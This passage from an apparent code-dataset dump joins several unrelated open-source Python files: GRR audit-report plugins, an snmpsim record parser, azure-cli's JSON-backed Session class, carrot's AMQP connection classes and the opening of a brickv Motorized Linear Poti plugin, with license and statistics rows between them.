AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class HuntApprovalsReportPlugin(report_plugin_base.ReportPluginBase):
"""Given timerange's hunt approvals."""
TYPE = TYPE
TITLE = "Hunt Approvals"
SUMMARY = "Hunt approval requests and grants for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = ["action", "description", "timestamp", "urn", "user"]
TYPES = [
events.AuditEvent.Action.HUNT_APPROVAL_GRANT,
events.AuditEvent.Action.HUNT_APPROVAL_REQUEST
]
def GetReportData(self, get_report_args, token):
"""Filter the hunt approvals in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class MostActiveUsersReportPlugin(report_plugin_base.ReportPluginBase):
"""Reports client activity by week."""
TYPE = TYPE
TITLE = "User Breakdown"
SUMMARY = "Active user actions."
REQUIRES_TIME_RANGE = True
def GetReportData(self, get_report_args, token):
"""Filter the last week of user actions."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
PIE_CHART)
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
counts = {}
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
counts.setdefault(event.user, 0)
counts[event.user] += 1
except ValueError: # Couldn't find any logs..
pass
ret.pie_chart.data = sorted(
(rdf_report_plugins.ApiReportDataPoint1D(x=count, label=user)
for user, count in counts.iteritems()
if user not in aff4_users.GRRUser.SYSTEM_USERS),
key=lambda series: series.label)
except IOError:
pass
return ret
class SystemFlowsReportPlugin(report_plugin_base.ReportPluginBase):
"""Count given timerange's system-created flows by type."""
TYPE = TYPE
TITLE = "System Flows"
SUMMARY = ("Flows launched by GRR crons and workers over the given timerange"
" grouped by type.")
REQUIRES_TIME_RANGE = True
def UserFilter(self, username):
return username in aff4_users.GRRUser.SYSTEM_USERS
def GetReportData(self, get_report_args, token):
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
STACK_CHART,
stack_chart=rdf_report_plugins.ApiStackChartReportData(x_ticks=[]))
# TODO(user): move the calculation to a cronjob and store results in
# AFF4.
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
# Store run count total and per-user
counts = {}
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if (event.action == events.AuditEvent.Action.RUN_FLOW and
self.UserFilter(event.user)):
counts.setdefault(event.flow_name, {"total": 0, event.user: 0})
counts[event.flow_name]["total"] += 1
counts[event.flow_name].setdefault(event.user, 0)
counts[event.flow_name][event.user] += 1
except ValueError: # Couldn't find any logs..
pass
for i, (flow, countdict) in enumerate(
sorted(counts.iteritems(), key=lambda x: x[1]["total"],
reverse=True)):
total_count = countdict["total"]
countdict.pop("total")
topusercounts = sorted(
countdict.iteritems(), key=operator.itemgetter(1), reverse=True)[:3]
topusers = ", ".join("%s (%s)" % (user, count)
for user, count in topusercounts)
ret.stack_chart.data.append(
rdf_report_plugins.ApiReportDataSeries2D(
# \u2003 is an emspace, a long whitespace character.
label=u"%s\u2003Run By: %s" % (flow, topusers),
points=[
rdf_report_plugins.ApiReportDataPoint2D(x=i, y=total_count)
]))
except IOError:
pass
return ret
class UserActivityReportPlugin(report_plugin_base.ReportPluginBase):
"""Display user activity by week."""
TYPE = TYPE
TITLE = "User Activity"
SUMMARY = "Number of flows ran by each user over the last few weeks."
# TODO(user): Support timerange selection.
WEEKS = 10
def GetReportData(self, get_report_args, token):
"""Filter the last week of user actions."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
STACK_CHART)
try:
user_activity = {}
week_duration = rdfvalue.Duration("7d")
offset = rdfvalue.Duration("%dw" % self.WEEKS)
now = rdfvalue.RDFDatetime.Now()
# TODO(user): Why is the rollover not a duration?
start_time = now - offset - rdfvalue.Duration(
config_lib.CONFIG["Logging.aff4_audit_log_rollover"])
try:
for fd in audit.AuditLogsForTimespan(start_time, now, token):
for event in fd.GenerateItems():
for week in xrange(self.__class__.WEEKS):
start = now - week * week_duration
if start < event.timestamp < (start + week_duration):
weekly_activity = user_activity.setdefault(
event.user, [[x, 0]
for x in xrange(-self.__class__.WEEKS, 0, 1)])
weekly_activity[-week][1] += 1
except ValueError: # Couldn't find any logs..
pass
ret.stack_chart.data = sorted(
(rdf_report_plugins.ApiReportDataSeries2D(
label=user,
points=(rdf_report_plugins.ApiReportDataPoint2D(x=x, y=y)
for x, y in data))
for user, data in user_activity.iteritems()
if user not in aff4_users.GRRUser.SYSTEM_USERS),
key=lambda series: series.label)
except IOError:
pass
return ret
class UserFlowsReportPlugin(report_plugin_base.ReportPluginBase):
"""Count given timerange's user-created flows by type."""
TYPE = TYPE
TITLE = "User Flows"
SUMMARY = ("Flows launched by GRR users over the given timerange grouped by "
"type.")
REQUIRES_TIME_RANGE = True
def UserFilter(self, username):
return username not in aff4_users.GRRUser.SYSTEM_USERS
def GetReportData(self, get_report_args, token):
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
STACK_CHART,
stack_chart=rdf_report_plugins.ApiStackChartReportData(x_ticks=[]))
# TODO(user): move the calculation to a cronjob and store results in
# AFF4.
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
# Store run count total and per-user
counts = {}
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if (event.action == events.AuditEvent.Action.RUN_FLOW and
self.UserFilter(event.user)):
counts.setdefault(event.flow_name, {"total": 0, event.user: 0})
counts[event.flow_name]["total"] += 1
counts[event.flow_name].setdefault(event.user, 0)
counts[event.flow_name][event.user] += 1
except ValueError: # Couldn't find any logs..
pass
for i, (flow, countdict) in enumerate(
sorted(counts.iteritems(), key=lambda x: x[1]["total"],
reverse=True)):
total_count = countdict["total"]
countdict.pop("total")
topusercounts = sorted(
countdict.iteritems(), key=operator.itemgetter(1), reverse=True)[:3]
topusers = ", ".join("%s (%s)" % (user, count)
for user, count in topusercounts)
ret.stack_chart.data.append(
rdf_report_plugins.ApiReportDataSeries2D(
# \u2003 is an emspace, a long whitespace character.
label=u"%s\u2003Run By: %s" % (flow, topusers),
points=[
rdf_report_plugins.ApiReportDataPoint2D(x=i, y=total_count)
]))
except IOError:
pass
return ret
| apache-2.0 | 3,755,911,516,339,074,000 | 33.223022 | 80 | 0.634223 | false | 3.870627 | false | false | false |
etingof/snmpsim | snmpsim/record/dump.py | 1 | 2041 |
#
# This file is part of snmpsim software.
#
# Copyright (c) 2010-2019, Ilya Etingof <[email protected]>
# License: http://snmplabs.com/snmpsim/license.html
#
from pyasn1.error import PyAsn1Error
from pyasn1.type import univ
from snmpsim.error import SnmpsimError
from snmpsim.grammar import dump
from snmpsim.record import abstract
class DumpRecord(abstract.AbstractRecord):
grammar = dump.DumpGrammar()
ext = 'dump'
def evaluate_oid(self, oid):
return univ.ObjectIdentifier(oid)
def evaluate_value(self, oid, tag, value, **context):
try:
value = self.grammar.TAG_MAP[tag](value)
except Exception as exc:
raise SnmpsimError(
'value evaluation error for tag %r, value %r: '
'%s' % (tag, value, exc))
# not all callers supply the context - just ignore it
try:
if (not context['nextFlag'] and
not context['exactMatch'] or
context['setFlag']):
return context['origOid'], tag, context['errorStatus']
except KeyError:
pass
return oid, tag, value
def evaluate(self, line, **context):
oid, tag, value = self.grammar.parse(line)
oid = self.evaluate_oid(oid)
if context.get('oidOnly'):
value = None
else:
try:
oid, tag, value = self.evaluate_value(
oid, tag, value, **context)
except PyAsn1Error as exc:
raise SnmpsimError(
'value evaluation for %s = %r failed: '
'%s\r\n' % (oid, value, exc))
return oid, value
def format_oid(self, oid):
return univ.ObjectIdentifier(oid).prettyPrint()
def format_value(self, oid, value, **context):
return self.format_oid(oid), self.grammar.get_tag_by_type(value), str(value)
def format(self, oid, value, **context):
return self.grammar.build(*self.format_value(oid, value, **context))
| bsd-2-clause | 1,179,372,855,638,163,200 | 28.57971 | 84 | 0.585007 | false | 3.872865 | false | false | false |
yugangw-msft/azure-cli | src/azure-cli-core/azure/cli/core/_session.py | 3 | 3898 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import json
import logging
import os
import time
try:
import collections.abc as collections
except ImportError:
import collections
from codecs import open as codecs_open
from knack.log import get_logger
try:
t_JSONDecodeError = json.JSONDecodeError
except AttributeError: # in Python 2.7
t_JSONDecodeError = ValueError
class Session(collections.MutableMapping):
"""
A simple dict-like class that is backed by a JSON file.
All direct modifications will save the file. Indirect modifications should
be followed by a call to `save_with_retry` or `save`.
"""
def __init__(self, encoding=None):
super(Session, self).__init__()
self.filename = None
self.data = {}
self._encoding = encoding if encoding else 'utf-8-sig'
def load(self, filename, max_age=0):
self.filename = filename
self.data = {}
try:
if max_age > 0:
st = os.stat(self.filename)
if st.st_mtime + max_age < time.time():
self.save()
with codecs_open(self.filename, 'r', encoding=self._encoding) as f:
self.data = json.load(f)
except (OSError, IOError, t_JSONDecodeError) as load_exception:
# OSError / IOError should imply file not found issues which are expected on fresh runs (e.g. on build
# agents or new systems). A parse error indicates invalid/bad data in the file. We do not wish to warn
# on missing files since we expect that, but do if the data isn't parsing as expected.
log_level = logging.INFO
if isinstance(load_exception, t_JSONDecodeError):
log_level = logging.WARNING
get_logger(__name__).log(log_level,
"Failed to load or parse file %s. It will be overridden by default settings.",
self.filename)
self.save()
def save(self):
if self.filename:
with codecs_open(self.filename, 'w', encoding=self._encoding) as f:
json.dump(self.data, f)
def save_with_retry(self, retries=5):
for _ in range(retries - 1):
try:
self.save()
break
except OSError:
time.sleep(0.1)
else:
self.save()
def get(self, key, default=None):
return self.data.get(key, default)
def __getitem__(self, key):
return self.data.setdefault(key, {})
def __setitem__(self, key, value):
self.data[key] = value
self.save_with_retry()
def __delitem__(self, key):
del self.data[key]
self.save_with_retry()
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
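# --- Illustrative usage sketch (not part of the original module) ---
# Session behaves like a dict persisted to a JSON file; a typical round trip
# (the file path is a placeholder):
#
#     session = Session()
#     session.load(os.path.expanduser("~/.azure/example.json"), max_age=3600)
#     session["key"] = "value"   # direct modification saves to disk immediately
#     print(session.get("key"))
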
# ACCOUNT contains subscriptions information
ACCOUNT = Session()
# CONFIG provides external configuration options
CONFIG = Session()
# SESSION provides read-write session variables
SESSION = Session()
# INDEX contains {top-level command: [command_modules and extensions]} mapping index
INDEX = Session()
# VERSIONS provides local versions and pypi versions.
# DO NOT USE it to get the current version of azure-cli,
# it could be lagged behind and can be used to check whether
# an upgrade of azure-cli happens
VERSIONS = Session()
# EXT_CMD_TREE provides command to extension name mapping
EXT_CMD_TREE = Session()
# CLOUD_ENDPOINTS provides endpoints/suffixes of clouds
CLOUD_ENDPOINTS = Session()
| mit | -5,590,041,453,470,257,000 | 31.214876 | 115 | 0.593381 | false | 4.331111 | false | false | false |
runeh/carrot | carrot/connection.py | 1 | 5146 |
from amqplib import client_0_8 as amqp
class AMQPConnection(object):
"""A network/socket connection to an AMQP message broker.
:param hostname: see :attr:`hostname`.
:param userid: see :attr:`userid`.
:param password: see :attr:`password`.
:keyword virtual_host: see :attr:`virtual_host`.
:keyword port: see :attr:`port`.
:keyword insist: see :attr:`insist`.
:keyword connect_timeout: see :attr:`connect_timeout`.
.. attribute:: hostname
The hostname to the AMQP server
.. attribute:: userid
A valid username used to authenticate to the server.
.. attribute:: password
The password used to authenticate to the server.
.. attribute:: virtual_host
The name of the virtual host to work with. This virtual host must
exist on the server, and the user must have access to it. Consult
        your broker's manual for help with creating and mapping
users to virtual hosts.
Default is ``"/"``.
.. attribute:: port
The port of the AMQP server. Default is ``5672`` (amqp).
.. attribute:: insist
Insist on connecting to a server. In a configuration with multiple
load-sharing servers, the insist option tells the server that the
client is insisting on a connection to the specified server.
Default is ``False``.
.. attribute:: connect_timeout
The timeout in seconds before we give up connecting to the server.
The default is no timeout.
.. attribute:: ssl
Use SSL to connect to the server.
The default is ``False``.
"""
virtual_host = "/"
port = 5672
insist = False
connect_timeout = None
ssl = False
@property
def host(self):
return ":".join([self.hostname, str(self.port)])
def __init__(self, hostname, userid, password,
virtual_host=None, port=None, **kwargs):
self.hostname = hostname
self.userid = userid
self.password = password
self.virtual_host = virtual_host or self.virtual_host
self.port = port or self.port
self.insist = kwargs.get("insist", self.insist)
self.connect_timeout = kwargs.get("connect_timeout",
self.connect_timeout)
self.ssl = kwargs.get("ssl", self.ssl)
self.connection = None
self.connect()
def connect(self):
"""Establish a connection to the AMQP server."""
self.connection = amqp.Connection(host=self.host,
userid=self.userid,
password=self.password,
virtual_host=self.virtual_host,
insist=self.insist,
ssl=self.ssl,
connect_timeout=self.connect_timeout)
return self.connection
def close(self):
"""Close the currently open connection."""
if self.connection:
self.connection.close()
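# --- Illustrative usage sketch (not part of the original module) ---
# Minimal example of opening a connection with the class above; the host and
# credentials are placeholders, not values taken from this repository.
#
#     conn = AMQPConnection("localhost", "guest", "guest", virtual_host="/")
#     channel = conn.connection.channel()  # amqplib channel for queue/exchange work
#     channel.close()
#     conn.close()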
class DummyConnection(object):
"""A connection class that does nothing, for non-networked backends."""
def __init__(self, *args, **kwargs):
pass
def connect(self):
pass
def close(self):
pass
@property
def host(self):
return ""
class DjangoAMQPConnection(AMQPConnection):
"""A version of :class:`AMQPConnection` that takes configuration
from the Django ``settings.py`` module.
:keyword hostname: The hostname of the AMQP server to connect to,
if not provided this is taken from ``settings.AMQP_SERVER``.
:keyword userid: The username of the user to authenticate to the server
as. If not provided this is taken from ``settings.AMQP_USER``.
:keyword password: The users password. If not provided this is taken
from ``settings.AMQP_PASSWORD``.
:keyword vhost: The name of the virtual host to work with.
This virtual host must exist on the server, and the user must
        have access to it. Consult your broker's manual for help with
        creating and mapping users to virtual hosts. If not provided
this is taken from ``settings.AMQP_VHOST``.
:keyword port: The port the AMQP server is running on. If not provided
this is taken from ``settings.AMQP_PORT``, or if that is not set,
the default is ``5672`` (amqp).
"""
def __init__(self, *args, **kwargs):
from django.conf import settings
kwargs["hostname"] = kwargs.get("hostname",
getattr(settings, "AMQP_SERVER"))
kwargs["userid"] = kwargs.get("userid",
getattr(settings, "AMQP_USER"))
kwargs["password"] = kwargs.get("password",
getattr(settings, "AMQP_PASSWORD"))
kwargs["virtual_host"] = kwargs.get("virtual_host",
getattr(settings, "AMQP_VHOST"))
kwargs["port"] = kwargs.get("port",
getattr(settings, "AMQP_PORT", self.port))
super(DjangoAMQPConnection, self).__init__(*args, **kwargs)
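# --- Illustrative usage sketch (not part of the original module) ---
# DjangoAMQPConnection pulls every parameter from Django settings, so a
# matching settings.py would contain entries like the following placeholders:
#
#     AMQP_SERVER = "localhost"
#     AMQP_USER = "guest"
#     AMQP_PASSWORD = "guest"
#     AMQP_VHOST = "/"
#     AMQP_PORT = 5672
#
#     connection = DjangoAMQPConnection()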
| bsd-3-clause | 3,954,186,530,620,627,500 | 32.415584 | 77 | 0.5993 | false | 4.440035 | false | false | false |
VikParuchuri/movide | api/serializers.py | 1 | 19255 |
from __future__ import unicode_literals
from django.forms import widgets
from rest_framework import serializers
from models import (Tag, Message, UserProfile, EmailSubscription, Classgroup,
Rating, ClassSettings, Resource, StudentClassSettings,
MESSAGE_TYPE_CHOICES, make_random_key, GRADING_CHOICES, Skill, SkillResource,
Section)
from django.contrib.auth.models import User
from django.db import IntegrityError
import logging
from django.conf import settings
import re
from rest_framework.pagination import PaginationSerializer
from django.contrib.sites.models import get_current_site
from permissions import ClassGroupPermissions
log = logging.getLogger(__name__)
WELCOME_MESSAGE2_TEMPLATE = """
To get started, you might want to create some resources. Resources are stacks of content and problems. Teachers and students can both create resources. Once you make resources, you can tie them to skills. Skills are collections of resources that allow self-paced learning and track student progress. Skills and resources can be discussed using the message function.
"""
WELCOME_MESSAGE_TEMPLATE = """
Welcome to your class {class_name}! You can remove this announcement by hitting the delete button at the bottom right of this. To invite your students, simply tell them to visit the url {class_link} and use the access code {access_key}. You can view these again in the settings view, as well as enable or disable student signup. If you have any questions, please feel free to email [email protected]. Hope you enjoy using Movide!
"""
def alphanumeric_name(string):
return re.sub(r'\W+', '', string.lower().encode("ascii", "ignore"))
def create_classgroups(classgroups, instance):
for c in classgroups:
try:
cg = Classgroup.objects.get(name=c)
except Classgroup.DoesNotExist:
continue
instance.classgroups.add(cg)
instance.save()
class EmailSubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = EmailSubscription
fields = ("email_address", )
class ClassSettingsField(serializers.SlugRelatedField):
def from_native(self, data):
serializer = ClassSettingsSerializer(data=data)
serializer.save()
return super(ClassSettingsField, self).from_native(data)
class TagSerializer(serializers.Serializer):
pk = serializers.Field()
messages = serializers.SlugRelatedField(many=True, slug_field='text', queryset=Message.objects.all(), required=False)
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", required=False, queryset=Classgroup.objects.all())
description = serializers.CharField()
name = serializers.CharField()
modified = serializers.Field()
display_name = serializers.CharField()
def restore_object(self, attrs, instance=None):
classgroup = attrs.get('classgroup')
name = attrs.get('name')
attributes = ["description"]
if instance is None:
try:
instance = Tag(name=name)
instance.save()
except IntegrityError:
instance = Tag.objects.get(name=alphanumeric_name(name), display_name=name)
try:
instance.classgroup = Classgroup.objects.get(name=classgroup)
except Classgroup.DoesNotExist:
raise serializers.ValidationError("Invalid classgroup specified: {0}".format(classgroup))
else:
cg = Classgroup.objects.get(name=classgroup)
if instance.classgroup != cg:
raise serializers.ValidationError("Classgroup given does not match classgroup on tag: {0}".format(classgroup))
instance = set_attributes(attributes, attrs, instance)
return instance
class RatingSerializer(serializers.Serializer):
message = serializers.PrimaryKeyRelatedField(many=False, queryset=Message.objects.all())
user = serializers.SlugRelatedField(slug_field="username", read_only=True)
rating = serializers.IntegerField()
modified = serializers.Field()
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
message = attrs.get('message')
attributes = ["rating"]
if message.classgroup not in user.classgroups.all():
raise serializers.ValidationError("Attempting rate a post that is not in your class.")
if instance is None:
instance, created = Rating.objects.get_or_create(user=user, message=message)
else:
if instance.user != user:
raise serializers.ValidationError("Attempting to edit a rating that is not yours.")
instance = set_attributes(attributes, attrs, instance)
instance.save()
return instance
class ClassSettingsSerializer(serializers.ModelSerializer):
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", read_only=True)
class Meta:
model = ClassSettings
fields = ("is_public", "moderate_posts", "classgroup",
"modified", "welcome_message", "enable_posting", "description", )
class StudentClassSettingsSerializer(serializers.ModelSerializer):
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", read_only=True)
user = serializers.SlugRelatedField(slug_field="username", read_only=True)
email_frequency_choices = serializers.Field()
class Meta:
model = StudentClassSettings
fields = ("classgroup", "user", "email_frequency", "email_frequency_choices", )
def set_attributes(attributes, values, instance):
for attrib in attributes:
val = values.get(attrib)
if val is not None:
setattr(instance, attrib, val)
return instance
class ClassgroupSerializer(serializers.Serializer):
name = serializers.CharField()
display_name = serializers.Field()
class_settings = serializers.RelatedField(many=False, required=False)
owner = serializers.SlugRelatedField(many=False, slug_field="username", required=False, queryset=User.objects.all())
users = serializers.SlugRelatedField(many=True, slug_field="username", required=False, queryset=User.objects.all())
pk = serializers.Field()
modified = serializers.Field()
created = serializers.Field()
link = serializers.Field(source="link")
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
name = attrs.get('name')
class_settings_values = attrs.get('class_settings')
attributes = ["description"]
settings_attributes = ['moderate_posts', 'is_public', 'allow_signups']
if instance is None:
try:
instance = Classgroup(owner=user, name=alphanumeric_name(name), display_name=name)
instance.save()
user.classgroups.add(instance)
user.save()
cg_perm = ClassGroupPermissions(instance)
cg_perm.setup()
cg_perm.assign_access_level(user, cg_perm.administrator)
try:
class_settings = ClassSettings(classgroup=instance, access_key=make_random_key())
class_settings.save()
except IntegrityError:
class_settings = ClassSettings.objects.get(classgroup=instance)
try:
message = Message(
user=user,
classgroup=instance,
source="welcome",
text=WELCOME_MESSAGE2_TEMPLATE,
message_type="A",
)
message.save()
message = Message(
user=user,
classgroup=instance,
source="welcome",
text=WELCOME_MESSAGE_TEMPLATE.format(
class_name=instance.display_name,
class_link=get_current_site(self.context['request']).domain + instance.link(),
access_key=class_settings.access_key
),
message_type="A",
)
message.save()
except IntegrityError:
pass
except IntegrityError:
error_msg = "Class name is already taken."
log.exception(error_msg)
raise serializers.ValidationError(error_msg)
else:
if not ClassGroupPermissions.is_teacher(instance, user):
raise serializers.ValidationError("Class name is already taken.")
class_settings = instance.class_settings
instance = set_attributes(attributes, attrs, instance)
if class_settings_values is not None:
class_settings = set_attributes(settings_attributes, class_settings_values, class_settings)
class_settings.save()
return instance
class RatingField(serializers.RelatedField):
def to_native(self, value):
return {
'rating': value.rating,
'user': value.user.username,
}
class MessageSerializer(serializers.Serializer):
pk = serializers.Field()
reply_count = serializers.Field(source="reply_count")
tags = serializers.SlugRelatedField(many=True, slug_field="name", required=False, queryset=Tag.objects.all())
user = serializers.SlugRelatedField(many=False, slug_field="username", required=False, queryset=User.objects.all())
user_image = serializers.Field(source="profile_image")
reply_to = serializers.PrimaryKeyRelatedField(required=False, queryset=Message.objects.all())
ratings = RatingField(many=True, read_only=True, required=False)
classgroup = serializers.SlugRelatedField(slug_field="name", required=False, queryset=Classgroup.objects.all())
resources = serializers.PrimaryKeyRelatedField(many=True, required=False, queryset=Resource.objects.all())
created_timestamp = serializers.Field(source="created_timestamp")
text = serializers.CharField()
source = serializers.CharField()
created = serializers.Field()
reply_count = serializers.Field()
approved = serializers.Field()
modified = serializers.Field()
depth = serializers.Field(source="depth")
avatar_url = serializers.Field(source="avatar_url")
message_type = serializers.ChoiceField(choices=MESSAGE_TYPE_CHOICES, default="D")
total_rating = serializers.Field(source="total_rating")
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
classgroup = attrs.get('classgroup')
attributes = ["text", "source", "reply_to"]
if (classgroup.class_settings is not None and
classgroup.class_settings.enable_posting is False and
not ClassGroupPermissions.is_teacher(classgroup, user)):
raise serializers.ValidationError("You are not allowed to make a post right now.")
if instance is None:
instance = Message(user=user, classgroup=classgroup)
else:
if instance.user != user:
raise serializers.ValidationError("Attempting to edit a message that is not yours.")
message_type = attrs.get('message_type')
if message_type == "A" and not ClassGroupPermissions.is_teacher(classgroup, user):
raise serializers.ValidationError("You cannot make an announcement unless you own a course.")
instance.message_type = message_type
instance = set_attributes(attributes, attrs, instance)
instance.save()
return instance
class PaginatedMessageSerializer(PaginationSerializer):
class Meta:
object_serializer_class = MessageSerializer
class NotificationSerializer(MessageSerializer):
notification_text = serializers.Field()
notification_created = serializers.Field()
notification_created_timestamp = serializers.Field()
class PaginatedNotificationSerializer(PaginationSerializer):
class Meta:
object_serializer_class = NotificationSerializer
class ResourceSerializer(serializers.Serializer):
pk = serializers.Field()
user = serializers.SlugRelatedField(many=False, slug_field="username", read_only=True)
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", read_only=True)
approved = serializers.BooleanField()
name = serializers.CharField()
display_name = serializers.Field()
section = serializers.SlugRelatedField(many=False, slug_field="name", required=False, read_only=True)
created_timestamp = serializers.Field(source="created_timestamp")
priority = serializers.Field()
modified = serializers.Field()
created = serializers.Field()
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
classgroup = attrs.get('classgroup')
name = attrs.get('name')
attributes = ['data', 'approved']
if instance is None:
instance = Resource(user=user, classgroup=classgroup, name=alphanumeric_name(name), display_name=name)
instance.save()
else:
if instance.user != user:
raise serializers.ValidationError("Class name is already taken.")
instance = set_attributes(attributes, attrs, instance)
return instance
class PaginatedResourceSerializer(PaginationSerializer):
class Meta:
object_serializer_class = ResourceSerializer
def create_user_profile(user):
profile = UserProfile(user=user)
profile.save()
class UserSerializer(serializers.Serializer):
image = serializers.Field(source="profile.image")
username = serializers.CharField()
messages = serializers.SlugRelatedField(many=True, slug_field="text", read_only=True, required=False)
resources = serializers.SlugRelatedField(many=True, slug_field="name", read_only=True, required=False)
classgroups = serializers.SlugRelatedField(many=True, slug_field="name", required=False, queryset=Classgroup.objects.all())
pk = serializers.Field()
def restore_object(self, attrs, instance=None):
username = attrs.get('username')
classgroups = attrs.get('classgroups')
try:
instance = User.objects.get(username=username)
except User.DoesNotExist:
try:
password = User.objects.make_random_password(10)
instance = User.objects.create_user(username=username, password=password)
except IntegrityError:
instance = User.objects.get(username=username)
try:
create_user_profile(instance)
except Exception:
error_msg = "Could not create a user profile."
log.exception(error_msg)
instance.delete()
raise serializers.ValidationError(error_msg)
create_classgroups(classgroups, instance)
if instance.classgroups.count()==0:
raise serializers.ValidationError("Invalid classgroups specified: {0}".format(classgroups))
return instance
class ClassgroupStatsSerializer(serializers.Serializer):
pk = serializers.Field()
network_info = serializers.Field(source="network_info")
message_count_by_day = serializers.Field(source="message_count_by_day")
message_count_today = serializers.Field(source="message_count_today")
message_count = serializers.Field(source="message_count")
user_count = serializers.Field(source="user_count")
user_count_today = serializers.Field(source="user_count_today")
display_name = serializers.Field()
name = serializers.CharField()
modified = serializers.Field()
class SectionSerializer(serializers.Serializer):
pk = serializers.Field()
name = serializers.CharField()
display_name = serializers.CharField(required=False)
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", required=False, queryset=Classgroup.objects.all())
modified = serializers.Field()
created = serializers.Field()
def restore_object(self, attrs, instance=None):
classgroup = attrs.get('classgroup')
name = attrs.get('name')
user = self.context['request'].user
if instance is None:
instance = Section(classgroup=classgroup, name=alphanumeric_name(name), display_name=name)
instance.save()
else:
if not ClassGroupPermissions.is_teacher(classgroup, user):
raise serializers.ValidationError("You do not have permission to modify this section.")
instance.name = alphanumeric_name(name)
instance.display_name = name
return instance
class SkillSerializer(serializers.Serializer):
pk = serializers.Field()
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", required=False, queryset=Classgroup.objects.all())
resource_text = serializers.Field(source="resource_text")
resource_ids = serializers.Field(source="resource_ids")
grading_policy = serializers.ChoiceField(choices=GRADING_CHOICES, default="COM")
name = serializers.CharField()
display_name = serializers.Field()
created_timestamp = serializers.Field(source="created_timestamp")
modified = serializers.Field()
created = serializers.Field()
def restore_object(self, attrs, instance=None):
classgroup = attrs.get('classgroup')
name = attrs.get('name')
attributes = ['grading_policy']
user = self.context['request'].user
if instance is None:
instance = Skill(classgroup=classgroup, name=alphanumeric_name(name), display_name=name)
instance.save()
else:
if not ClassGroupPermissions.is_teacher(classgroup, user):
raise serializers.ValidationError("You do not have permission to modify this skill.")
instance.name = alphanumeric_name(name)
instance.display_name = name
resources = self.context['request'].DATA.get('resources')
if isinstance(resources, basestring):
resources = [resources]
if resources is not None:
resources = [str(r).strip() for r in resources]
else:
resources = []
skill_resources = []
for (i, r) in enumerate(resources):
if len(r) < 1:
continue
resource = Resource.objects.get(display_name=r, classgroup=classgroup)
skill_resource, created = SkillResource.objects.get_or_create(
resource=resource,
skill=instance
)
skill_resource.priority = i
skill_resource.save()
skill_resources.append(skill_resource)
for s in SkillResource.objects.filter(skill=instance):
if s not in skill_resources:
s.delete()
instance = set_attributes(attributes, attrs, instance)
return instance
class PaginatedSkillSerializer(PaginationSerializer):
class Meta:
object_serializer_class = SkillSerializer
| agpl-3.0 | -4,851,591,364,296,762,000 | 41.694013 | 432 | 0.661906 | false | 4.521014 | false | false | false |
Tinkerforge/brickv | src/brickv/plugin_system/plugins/motorized_linear_poti/motorized_linear_poti.py | 1 | 5261 | # -*- coding: utf-8 -*-
"""
Motorized LinearPoti Plugin
Copyright (C) 2015-2017 Olaf Lüke <[email protected]>
Copyright (C) 2016 Matthias Bolte <[email protected]>
motorized_linear_poti.py: Motorized Linear Poti Plugin implementation
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QSlider, QCheckBox, QFrame, QComboBox
from brickv.plugin_system.comcu_plugin_base import COMCUPluginBase
from brickv.bindings.bricklet_motorized_linear_poti import BrickletMotorizedLinearPoti
from brickv.plot_widget import PlotWidget, CurveValueWrapper, FixedSizeLabel
from brickv.async_call import async_call
from brickv.callback_emulator import CallbackEmulator
class MotorPositionLabel(FixedSizeLabel):
def setText(self, text):
text = "Motor Target Position: " + text
